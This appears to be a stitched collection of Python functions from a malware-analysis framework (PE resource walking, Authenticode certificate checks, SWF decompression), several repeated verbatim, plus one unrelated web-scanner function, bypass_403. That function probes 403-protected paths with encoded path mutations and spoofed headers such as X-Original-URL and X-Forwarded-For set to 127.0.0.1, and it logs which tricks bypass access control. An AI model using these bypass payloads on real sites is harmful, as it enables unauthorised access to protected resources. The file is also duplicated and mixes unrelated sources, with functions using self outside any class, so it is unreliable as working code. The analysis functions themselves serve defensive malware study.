def get_resources(pe):
    """Walk the PE resource directory and return one row per resource.

    Each row is [count, name, offset, md5, size, filetype, language,
    sublanguage] (plus the dump path when resources are being dumped).
    Returns an empty list when the PE has no resource directory.
    """
    resources = []
    if not hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
        return resources

    count = 1
    for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        try:
            if resource_type.name is not None:
                name = str(resource_type.name)
            else:
                # BUGFIX: look up the friendly type name first and only then
                # stringify it. The original did str(RESOURCE_TYPE.get(...)),
                # which turns a missing entry into the literal string "None",
                # so the numeric-Id fallback below could never trigger.
                name = pefile.RESOURCE_TYPE.get(resource_type.struct.Id)
                if name is None:
                    name = str(resource_type.struct.Id)
                else:
                    name = str(name)

            if hasattr(resource_type, 'directory'):
                for resource_id in resource_type.directory.entries:
                    if hasattr(resource_id, 'directory'):
                        for resource_lang in resource_id.directory.entries:
                            data = pe.get_data(resource_lang.data.struct.OffsetToData,
                                               resource_lang.data.struct.Size)
                            filetype = get_type(data)
                            md5 = get_md5(data)
                            language = pefile.LANG.get(resource_lang.data.lang, None)
                            sublanguage = pefile.get_sublang_name_for_lang(
                                resource_lang.data.lang, resource_lang.data.sublang)
                            offset = ('%-8s' % hex(resource_lang.data.struct.OffsetToData)).strip()
                            size = ('%-8s' % hex(resource_lang.data.struct.Size)).strip()

                            resource = [count, name, offset, md5, size,
                                        filetype, language, sublanguage]

                            # Dump resources if requested to and if the file currently being
                            # processed is the opened session file.
                            # This is to avoid that during a --scan all the resources being
                            # scanned are dumped as well.
                            if (self.args.open or self.args.dump) and pe == self.pe:
                                if self.args.dump:
                                    folder = self.args.dump
                                else:
                                    folder = tempfile.mkdtemp()

                                resource_path = os.path.join(
                                    folder,
                                    '{0}_{1}_{2}'.format(__sessions__.current.file.md5,
                                                         offset, name))
                                resource.append(resource_path)

                                with open(resource_path, 'wb') as resource_handle:
                                    resource_handle.write(data)

                            resources.append(resource)
                            count += 1
        except Exception as e:
            # Best effort: log and keep walking the remaining resource types.
            self.log('error', e)
            continue

    return resources
def get_signed_samples(current=None, cert_filter=None):
    """Scan the repository for signed samples.

    :param current: sha256 of the currently opened file, which is skipped.
    :param cert_filter: when given, only samples whose certificate MD5
        matches are returned as [name, md5]; otherwise every signed sample
        is returned as [name, md5, cert_md5].
    """
    db = Database()
    samples = db.find(key='all')

    results = []
    for sample in samples:
        # Skip if it's the same file.
        if current:
            if sample.sha256 == current:
                continue

        # Obtain path to the binary.
        sample_path = get_sample_path(sample.sha256)
        if not os.path.exists(sample_path):
            continue

        # Open PE instance. Best effort: unparsable files are skipped.
        # BUGFIX: narrowed the bare `except:` so SystemExit/KeyboardInterrupt
        # are no longer swallowed while scanning the whole repository.
        try:
            cur_pe = pefile.PE(sample_path)
        except Exception:
            continue

        cur_cert_data = get_certificate(cur_pe)
        if not cur_cert_data:
            continue

        cur_cert_md5 = get_md5(cur_cert_data)
        if cert_filter:
            if cur_cert_md5 == cert_filter:
                results.append([sample.name, sample.md5])
        else:
            results.append([sample.name, sample.md5, cur_cert_md5])

    return results
def decompress(self, dump_dir):
    """Inflate the opened SWF object, hexdump it and optionally dump it.

    Handles zlib-compressed (CWS) and LZMA-compressed (ZWS) Flash files;
    an already-uncompressed file (FWS) is reported and left alone.
    """
    # TODO: this might be a bit hacky, need to verify whether malformed
    # Flash exploit would get a different file type.
    if 'Flash' not in __sessions__.current.file.type:
        self.log('error', "The opened file doesn't appear to be a valid SWF object")
        return

    # Key information extracted from the opened SWF file.
    header, version, size, data = self.parse_swf()

    # Will hold the reconstructed, uncompressed Flash object.
    swf = None

    if header == 'FWS':
        # Already a decompressed Flash object: nothing to do.
        self.log('info', "The opened file doesn't appear to be compressed")
        return

    if header == 'CWS':
        self.log('info', "The opened file appears to be compressed with Zlib")

        stream = StringIO(data)
        stream.read(3)  # drop the 'CWS' signature
        # 'FWS' + the 5 version/length bytes + the inflated body.
        swf = 'FWS' + stream.read(5) + zlib.decompress(stream.read())
    elif header == 'ZWS':
        self.log('info', "The opened file appears to be compressed with Lzma")

        # A third-party library is needed to decompress LZMA.
        if not HAVE_PYLZMA:
            self.log('error', "Missing dependency, please install pylzma (`pip install pylzma`)")
            return

        ## ZWS(LZMA)
        ## | 4 bytes       | 4 bytes   | 4 bytes       | 5 bytes    | n bytes   | 6 bytes         |
        ## | 'ZWS'+version | scriptLen | compressedLen | LZMA props | LZMA data | LZMA end marker |
        stream = StringIO(data)
        stream.read(3)  # drop the 'ZWS' signature
        swf = 'FWS' + stream.read(5)
        stream.read(4)  # skip compressedLen
        swf += pylzma.decompress(stream.read())

    # Unknown header or empty result: nothing to show.
    if not swf:
        return

    # Print the decompressed data.
    # TODO: this prints too much, need to find a better way to display
    # this. Paginate?
    self.log('', cyan(hexdump(swf)))

    if dump_dir:
        # Dump the decompressed SWF file to the specified directory
        # or to the default temporary one.
        dump_path = os.path.join(dump_dir, '{0}.swf'.format(get_md5(swf)))

        with open(dump_path, 'wb') as handle:
            handle.write(swf)

        self.log('info', "Flash object dumped at {0}".format(dump_path))

        # Directly open a session on the dumped Flash object.
        __sessions__.new(dump_path)
def decompress(self, dump_dir):
    """Decompress the opened SWF object and optionally dump it to ``dump_dir``.

    Supports zlib-compressed (CWS) and LZMA-compressed (ZWS) Flash files;
    uncompressed files (FWS) are reported and left untouched.
    """
    # Check if the file type is right.
    # TODO: this might be a bit hacky, need to verify whether malformed
    # Flash exploit would get a different file type.
    if 'Flash' not in __sessions__.current.file.type:
        self.log('error', "The opened file doesn't appear to be a valid SWF object")
        return

    # Retrieve key information from the opened SWF file.
    header, version, size, data = self.parse_swf()
    # Decompressed data.
    decompressed = None

    # Check if the file is already a decompressed Flash object.
    if header == 'FWS':
        self.log('info', "The opened file doesn't appear to be compressed")
        return
    # Check if the file is compressed with zlib.
    elif header == 'CWS':
        self.log('info', "The opened file appears to be compressed with Zlib")

        # Open a handle on the compressed data.
        compressed = StringIO(data)
        # Skip the 3-byte 'CWS' header signature.
        compressed.read(3)
        # Decompress and reconstruct the Flash object:
        # 'FWS' + version/length fields + inflated body.
        decompressed = 'FWS' + compressed.read(5) + zlib.decompress(compressed.read())
    # Check if the file is compressed with lzma.
    elif header == 'ZWS':
        self.log('info', "The opened file appears to be compressed with Lzma")

        # We need a third-party library to decompress this.
        if not HAVE_PYLZMA:
            self.log('error', "Missing dependency, please install pylzma (`pip install pylzma`)")
            return

        # Open a handle on the compressed data.
        compressed = StringIO(data)
        # Skip the 3-byte 'ZWS' header signature.
        compressed.read(3)
        # Decompress with pylzma and reconstruct the Flash object.
        ## ZWS(LZMA)
        ## | 4 bytes       | 4 bytes   | 4 bytes       | 5 bytes    | n bytes   | 6 bytes         |
        ## | 'ZWS'+version | scriptLen | compressedLen | LZMA props | LZMA data | LZMA end marker |
        decompressed = 'FWS' + compressed.read(5)
        compressed.read(4)  # skip compressedLen
        decompressed += pylzma.decompress(compressed.read())

    # If we obtained some decompressed data, we print it and eventually
    # dump it to file.
    if decompressed:
        # Print the decompressed data.
        # TODO: this prints too much, need to find a better way to display
        # this. Paginate?
        self.log('', cyan(hexdump(decompressed)))

        if dump_dir:
            # Dump the decompressed SWF file to the specified directory
            # or to the default temporary one.
            dump_path = os.path.join(dump_dir, '{0}.swf'.format(get_md5(decompressed)))

            with open(dump_path, 'wb') as handle:
                handle.write(decompressed)

            self.log('info', "Flash object dumped at {0}".format(dump_path))

            # Directly open a session on the dumped Flash object.
            __sessions__.new(dump_path)
def bypass_403(self, resp, timeout=20):
    """Probe a 403-protected URL with path- and header-based bypass tricks.

    Replays the request path of ``resp`` with a list of mutated path
    payloads, then with a list of spoofing headers (X-Original-URL,
    X-Forwarded-For, ...). A bypass is recorded into ``self.results``
    when a probe returns HTTP 200 whose body MD5 differs from the
    site's index page. Each phase stops at the first hit.

    :param resp: the original (403) response being retried.
    :param timeout: per-request timeout in seconds.
    """
    OriginalUrl = resp.request.path_url
    Rurl = resp.request.path_url
    # Internal sentinel path used by the 404-existence check; never probe it.
    if OriginalUrl == "/SScan-404-existence-check":
        return
    # Strip the trailing slash (except for the root path) so the payloads
    # below can be appended to a clean last path segment.
    if Rurl != "/":
        Rurl = resp.request.path_url.rstrip("/")
    PreviousPath = '/'.join(str(Rurl).split('/')[:-1])
    LastPath = str(Rurl).split('/')[-1]
    # Path-mutation payloads applied to the last path segment.
    payloads = [
        "%2e/" + LastPath, "%2f/" + LastPath, LastPath + "/.",
        LastPath + "/./.", LastPath + "/././", LastPath + "/./",
        "./" + LastPath + "/./", LastPath + "%20/", LastPath + "%09/",
        "%20" + LastPath + "%20/", LastPath + "/..;/", LastPath + "..;/",
        LastPath + "?", LastPath + "??", LastPath + "???",
        LastPath + "//", LastPath + "/*", LastPath + "/*/",
        "/" + LastPath + "//", LastPath + "/", LastPath + "/.randomstring"
    ]
    # Header payloads: URL-rewrite headers plus common IP-spoofing headers.
    hpayloads = [{
        "X-Rewrite-URL": OriginalUrl
    }, {
        "X-Original-URL": OriginalUrl
    }, {
        "Referer": "/" + LastPath
    }, {
        "X-Custom-IP-Authorization": "127.0.0.1"
    }, {
        "X-Originating-IP": "127.0.0.1"
    }, {
        "X-Forwarded-For": "127.0.0.1"
    }, {
        "X-Remote-IP": "127.0.0.1"
    }, {
        "X-Client-IP": "127.0.0.1"
    }, {
        "X-Host": "127.0.0.1"
    }, {
        "X-Forwarded-Host": "127.0.0.1"
    }]
    # Phase 1: path-based payloads.
    for p in payloads:
        url = PreviousPath + "/" + p
        resp_p = self.session.get(self.base_url + url,
                                  allow_redirects=False,
                                  headers=setting.default_headers,
                                  timeout=timeout,
                                  verify=False)
        # If the status code is 200 and the page's MD5 differs from the
        # index page's, consider the 403 bypassed.
        if resp_p.status_code == 200 and self.index_md5 != get_md5(
                resp_p, setting.default_headers):
            if OriginalUrl not in self.results:
                self.results[OriginalUrl] = []
            _ = {
                'status': resp.status_code,
                'url': '%s%s' % (self.base_url, OriginalUrl),
                'title': '绕过payload: %s%s' % (self.base_url, url),
                'vul_type': "403绕过"
            }
            if _ not in self.results[OriginalUrl]:
                self.results[OriginalUrl].append(_)
            break
    # Phase 2: header-based payloads.
    for hp in hpayloads:
        # Build a fresh headers dict on every iteration: updating
        # setting.default_headers directly would accumulate payload headers
        # across iterations and mutate the shared default headers.
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
            "Connection": "close",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
        }
        # Extract the single header name from the one-entry payload dict.
        key, = hp
        new_url = ""
        # X-Original-URL / X-Rewrite-URL need a decoy request path; the real
        # path travels in the header instead.
        if key == "X-Original-URL":
            new_url = Rurl + "4nyth1ng"
        if key == "X-Rewrite-URL":
            new_url = "/"
        # Add header.
        headers.update(hp)
        if new_url:
            url = new_url
        else:
            url = OriginalUrl
        resp_hp = self.session.get(self.base_url + url,
                                   allow_redirects=False,
                                   headers=headers,
                                   timeout=timeout,
                                   verify=False)
        # If the status code is 200 and the page's MD5 differs from the
        # index page's, consider the 403 bypassed.
        if resp_hp.status_code == 200 and self.index_md5 != get_md5(
                resp_hp, headers):
            if OriginalUrl not in self.results:
                self.results[OriginalUrl] = []
            _ = {
                'status': resp.status_code,
                'url': '%s%s' % (self.base_url, OriginalUrl),
                'title':
                '绕过payload: %s%s, Header payload: %s' % (self.base_url, url, hp),
                'vul_type': "403绕过"
            }
            if _ not in self.results[OriginalUrl]:
                self.results[OriginalUrl].append(_)
            # print(_)
            break
def security(self):
    """Inspect, dump and verify the Authenticode certificate of the open PE."""

    def get_certificate(pe):
        # TODO: this only extract the raw list of certificate data.
        # I need to parse them, extract single certificates and perhaps return
        # the PEM data of the first certificate only.
        pe_security_dir = pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']
        address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].VirtualAddress
        # size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].Size
        if address:
            # Skip the 8-byte WIN_CERTIFICATE header and return the raw blob.
            return pe.write()[address + 8:]
        else:
            return None

    def get_signed_samples(current=None, cert_filter=None):
        # Collect [name, md5(, cert_md5)] rows for every signed sample in
        # the repository, optionally filtering on a certificate MD5.
        db = Database()
        samples = db.find(key='all')

        results = []
        for sample in samples:
            # Skip if it's the same file.
            if current:
                if sample.sha256 == current:
                    continue

            # Obtain path to the binary.
            sample_path = get_sample_path(sample.sha256)
            if not os.path.exists(sample_path):
                continue

            # Open PE instance (best effort: skip unparsable samples).
            # BUGFIX: narrowed the bare `except:` so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            try:
                cur_pe = pefile.PE(sample_path)
            except Exception:
                continue

            cur_cert_data = get_certificate(cur_pe)
            if not cur_cert_data:
                continue

            cur_cert_md5 = get_md5(cur_cert_data)
            if cert_filter:
                if cur_cert_md5 == cert_filter:
                    results.append([sample.name, sample.md5])
            else:
                results.append([sample.name, sample.md5, cur_cert_md5])

        return results

    if self.args.all:
        self.log('info', "Scanning the repository for all signed samples...")

        all_of_them = get_signed_samples()

        self.log('info', "{0} signed samples found".format(bold(len(all_of_them))))

        if len(all_of_them) > 0:
            self.log('table', dict(header=['Name', 'MD5', 'Cert MD5'], rows=all_of_them))

        return

    if not self.__check_session():
        return

    cert_data = get_certificate(self.pe)
    if not cert_data:
        self.log('warning', "No certificate found")
        return

    cert_md5 = get_md5(cert_data)
    self.log('info', "Found certificate with MD5 {0}".format(bold(cert_md5)))

    if self.args.dump:
        cert_path = os.path.join(self.args.dump,
                                 '{0}.crt'.format(__sessions__.current.file.sha256))
        with open(cert_path, 'wb+') as cert_handle:
            cert_handle.write(cert_data)

        self.log('info', "Dumped certificate to {0}".format(cert_path))
        self.log('info', "You can parse it using the following command:\n\t" +
                 bold("openssl pkcs7 -inform DER -print_certs -text -in {0}".format(cert_path)))

    # TODO: do scan for certificate's serial number.
    if self.args.scan:
        self.log('info', "Scanning the repository for matching signed samples...")

        matches = get_signed_samples(current=__sessions__.current.file.sha256,
                                     cert_filter=cert_md5)

        self.log('info', "{0} relevant matches found".format(bold(len(matches))))

        if len(matches) > 0:
            self.log('table', dict(header=['Name', 'SHA256'], rows=matches))

    # TODO: this function needs to be better integrated with the rest of the command.
    # TODO: need to add more error handling and figure out why so many samples are failing.
    if self.args.check:
        if not HAVE_VERIFYSIGS:
            self.log('error', "Dependencies missing for authenticode validation. Please install M2Crypto and pyasn1 (`pip install pyasn1 M2Crypto`)")
            return

        try:
            auth, computed_content_hash = get_auth_data(__sessions__.current.file.path)
        except Exception as e:
            self.log('error', "Unable to parse PE certificate: {0}".format(str(e)))
            return

        # BUGFIX: the original used the Python-2-only `except Exception, e:`
        # form, which is a SyntaxError on Python 3; the `as` form is valid
        # on both Python 2.6+ and Python 3.
        try:
            auth.ValidateAsn1()
            auth.ValidateHashes(computed_content_hash)
            auth.ValidateSignatures()
            auth.ValidateCertChains(time.gmtime())
        except Exception as e:
            self.log('error', "Unable to validate PE certificate: {0}".format(str(e)))
            return

        self.log('info', bold('Signature metadata:'))
        self.log('info', 'Program name: {0}'.format(auth.program_name))
        self.log('info', 'URL: {0}'.format(auth.program_url))

        if auth.has_countersignature:
            self.log('info', bold('Countersignature is present. Timestamp: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_timestamp)))))
        else:
            self.log('info', bold('Countersignature is not present.'))

        self.log('info', bold('Binary is signed with cert issued by:'))
        self.log('info', '{0}'.format(auth.signing_cert_id[0]))
        self.log('info', '{0}'.format(auth.cert_chain_head[2][0]))
        self.log('info', 'Chain not before: {0} UTC'.format(
            time.asctime(time.gmtime(auth.cert_chain_head[0]))))
        self.log('info', 'Chain not after: {0} UTC'.format(
            time.asctime(time.gmtime(auth.cert_chain_head[1]))))

        if auth.has_countersignature:
            self.log('info', bold('Countersig chain head issued by:'))
            self.log('info', '{0}'.format(auth.counter_chain_head[2]))
            self.log('info', 'Countersig not before: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_chain_head[0]))))
            self.log('info', 'Countersig not after: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_chain_head[1]))))

        self.log('info', bold('Certificates:'))
        for (issuer, serial), cert in auth.certificates.items():
            self.log('info', 'Issuer: {0}'.format(issuer))
            self.log('info', 'Serial: {0}'.format(serial))

            subject = cert[0][0]['subject']
            subject_dn = str(dn.DistinguishedName.TraverseRdn(subject[0]))
            self.log('info', 'Subject: {0}'.format(subject_dn))

            not_before = cert[0][0]['validity']['notBefore']
            not_after = cert[0][0]['validity']['notAfter']
            not_before_time = not_before.ToPythonEpochTime()
            not_after_time = not_after.ToPythonEpochTime()
            self.log('info', 'Not Before: {0} UTC ({1})'.format(
                time.asctime(time.gmtime(not_before_time)), not_before[0]))
            self.log('info', 'Not After: {0} UTC ({1})'.format(
                time.asctime(time.gmtime(not_after_time)), not_after[0]))

        if auth.trailing_data:
            # NOTE(review): str.encode('hex') is Python-2-only; if this file
            # is ported to Python 3, switch to binascii.hexlify() here.
            self.log('info', 'Signature Blob had trailing (unvalidated) data ({0} bytes): {1}'.format(
                len(auth.trailing_data), auth.trailing_data.encode('hex')))
def get_resources(pe):
    """Walk the PE resource directory and return one row per resource.

    Each row is [count, name, offset, md5, size, filetype, language,
    sublanguage] (plus the dump path when resources are being dumped).
    Returns an empty list when the PE has no resource directory.
    """
    resources = []
    if not hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
        return resources

    count = 1
    for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        try:
            if resource_type.name is not None:
                name = str(resource_type.name)
            else:
                # BUGFIX: look up the friendly type name first and only then
                # stringify it. The original did str(RESOURCE_TYPE.get(...)),
                # which turns a missing entry into the literal string "None",
                # so the numeric-Id fallback below could never trigger.
                name = pefile.RESOURCE_TYPE.get(resource_type.struct.Id)
                if name is None:
                    name = str(resource_type.struct.Id)
                else:
                    name = str(name)

            if hasattr(resource_type, 'directory'):
                for resource_id in resource_type.directory.entries:
                    if hasattr(resource_id, 'directory'):
                        for resource_lang in resource_id.directory.entries:
                            data = pe.get_data(resource_lang.data.struct.OffsetToData,
                                               resource_lang.data.struct.Size)
                            filetype = get_type(data)
                            md5 = get_md5(data)
                            language = pefile.LANG.get(resource_lang.data.lang, None)
                            sublanguage = pefile.get_sublang_name_for_lang(
                                resource_lang.data.lang, resource_lang.data.sublang)
                            offset = ('%-8s' % hex(resource_lang.data.struct.OffsetToData)).strip()
                            size = ('%-8s' % hex(resource_lang.data.struct.Size)).strip()

                            resource = [count, name, offset, md5, size,
                                        filetype, language, sublanguage]

                            # Dump resources if requested to and if the file currently being
                            # processed is the opened session file.
                            # This is to avoid that during a --scan all the resources being
                            # scanned are dumped as well.
                            if (self.args.open or self.args.dump) and pe == self.pe:
                                if self.args.dump:
                                    folder = self.args.dump
                                else:
                                    folder = tempfile.mkdtemp()

                                resource_path = os.path.join(
                                    folder,
                                    '{0}_{1}_{2}'.format(__sessions__.current.file.md5,
                                                         offset, name))
                                resource.append(resource_path)

                                with open(resource_path, 'wb') as resource_handle:
                                    resource_handle.write(data)

                            resources.append(resource)
                            count += 1
        except Exception as e:
            # Best effort: log and keep walking the remaining resource types.
            self.log('error', e)
            continue

    return resources
def security(self):
    """Inspect, dump and verify the Authenticode certificate of the open PE."""

    def get_certificate(pe):
        # TODO: this only extract the raw list of certificate data.
        # I need to parse them, extract single certificates and perhaps return
        # the PEM data of the first certificate only.
        pe_security_dir = pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']
        address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].VirtualAddress
        # size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].Size
        if address:
            # Skip the 8-byte WIN_CERTIFICATE header and return the raw blob.
            return pe.write()[address + 8:]
        else:
            return None

    def get_signed_samples(current=None, cert_filter=None):
        # Collect [name, md5(, cert_md5)] rows for every signed sample in
        # the repository, optionally filtering on a certificate MD5.
        db = Database()
        samples = db.find(key='all')

        results = []
        for sample in samples:
            # Skip if it's the same file.
            if current:
                if sample.sha256 == current:
                    continue

            # Obtain path to the binary.
            sample_path = get_sample_path(sample.sha256)
            if not os.path.exists(sample_path):
                continue

            # Open PE instance (best effort: skip unparsable samples).
            # BUGFIX: narrowed the bare `except:` so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            try:
                cur_pe = pefile.PE(sample_path)
            except Exception:
                continue

            cur_cert_data = get_certificate(cur_pe)
            if not cur_cert_data:
                continue

            cur_cert_md5 = get_md5(cur_cert_data)
            if cert_filter:
                if cur_cert_md5 == cert_filter:
                    results.append([sample.name, sample.md5])
            else:
                results.append([sample.name, sample.md5, cur_cert_md5])

        return results

    if self.args.all:
        self.log('info', "Scanning the repository for all signed samples...")

        all_of_them = get_signed_samples()

        self.log('info', "{0} signed samples found".format(bold(len(all_of_them))))

        if len(all_of_them) > 0:
            self.log('table', dict(header=['Name', 'MD5', 'Cert MD5'], rows=all_of_them))

        return

    if not self.__check_session():
        return

    cert_data = get_certificate(self.pe)
    if not cert_data:
        self.log('warning', "No certificate found")
        return

    cert_md5 = get_md5(cert_data)
    self.log('info', "Found certificate with MD5 {0}".format(bold(cert_md5)))

    if self.args.dump:
        cert_path = os.path.join(self.args.dump,
                                 '{0}.crt'.format(__sessions__.current.file.sha256))
        with open(cert_path, 'wb+') as cert_handle:
            cert_handle.write(cert_data)

        self.log('info', "Dumped certificate to {0}".format(cert_path))
        self.log('info', "You can parse it using the following command:\n\t" +
                 bold("openssl pkcs7 -inform DER -print_certs -text -in {0}".format(cert_path)))

    # TODO: do scan for certificate's serial number.
    if self.args.scan:
        self.log('info', "Scanning the repository for matching signed samples...")

        matches = get_signed_samples(current=__sessions__.current.file.sha256,
                                     cert_filter=cert_md5)

        self.log('info', "{0} relevant matches found".format(bold(len(matches))))

        if len(matches) > 0:
            self.log('table', dict(header=['Name', 'SHA256'], rows=matches))

    # TODO: this function needs to be better integrated with the rest of the command.
    # TODO: need to add more error handling and figure out why so many samples are failing.
    if self.args.check:
        if not HAVE_VERIFYSIGS:
            self.log('error', "Dependencies missing for authenticode validation. Please install M2Crypto and pyasn1 (`pip install pyasn1 M2Crypto`)")
            return

        try:
            auth, computed_content_hash = get_auth_data(__sessions__.current.file.path)
        except Exception as e:
            self.log('error', "Unable to parse PE certificate: {0}".format(str(e)))
            return

        # BUGFIX: the original used the Python-2-only `except Exception, e:`
        # form, which is a SyntaxError on Python 3; the `as` form is valid
        # on both Python 2.6+ and Python 3.
        try:
            auth.ValidateAsn1()
            auth.ValidateHashes(computed_content_hash)
            auth.ValidateSignatures()
            auth.ValidateCertChains(time.gmtime())
        except Exception as e:
            self.log('error', "Unable to validate PE certificate: {0}".format(str(e)))
            return

        self.log('info', bold('Signature metadata:'))
        self.log('info', 'Program name: {0}'.format(auth.program_name))
        self.log('info', 'URL: {0}'.format(auth.program_url))

        if auth.has_countersignature:
            self.log('info', bold('Countersignature is present. Timestamp: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_timestamp)))))
        else:
            self.log('info', bold('Countersignature is not present.'))

        self.log('info', bold('Binary is signed with cert issued by:'))
        self.log('info', '{0}'.format(auth.signing_cert_id[0]))
        self.log('info', '{0}'.format(auth.cert_chain_head[2][0]))
        self.log('info', 'Chain not before: {0} UTC'.format(
            time.asctime(time.gmtime(auth.cert_chain_head[0]))))
        self.log('info', 'Chain not after: {0} UTC'.format(
            time.asctime(time.gmtime(auth.cert_chain_head[1]))))

        if auth.has_countersignature:
            self.log('info', bold('Countersig chain head issued by:'))
            self.log('info', '{0}'.format(auth.counter_chain_head[2]))
            self.log('info', 'Countersig not before: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_chain_head[0]))))
            self.log('info', 'Countersig not after: {0} UTC'.format(
                time.asctime(time.gmtime(auth.counter_chain_head[1]))))

        self.log('info', bold('Certificates:'))
        for (issuer, serial), cert in auth.certificates.items():
            self.log('info', 'Issuer: {0}'.format(issuer))
            self.log('info', 'Serial: {0}'.format(serial))

            subject = cert[0][0]['subject']
            subject_dn = str(dn.DistinguishedName.TraverseRdn(subject[0]))
            self.log('info', 'Subject: {0}'.format(subject_dn))

            not_before = cert[0][0]['validity']['notBefore']
            not_after = cert[0][0]['validity']['notAfter']
            not_before_time = not_before.ToPythonEpochTime()
            not_after_time = not_after.ToPythonEpochTime()
            self.log('info', 'Not Before: {0} UTC ({1})'.format(
                time.asctime(time.gmtime(not_before_time)), not_before[0]))
            self.log('info', 'Not After: {0} UTC ({1})'.format(
                time.asctime(time.gmtime(not_after_time)), not_after[0]))

        if auth.trailing_data:
            # NOTE(review): str.encode('hex') is Python-2-only; if this file
            # is ported to Python 3, switch to binascii.hexlify() here.
            self.log('info', 'Signature Blob had trailing (unvalidated) data ({0} bytes): {1}'.format(
                len(auth.trailing_data), auth.trailing_data.encode('hex')))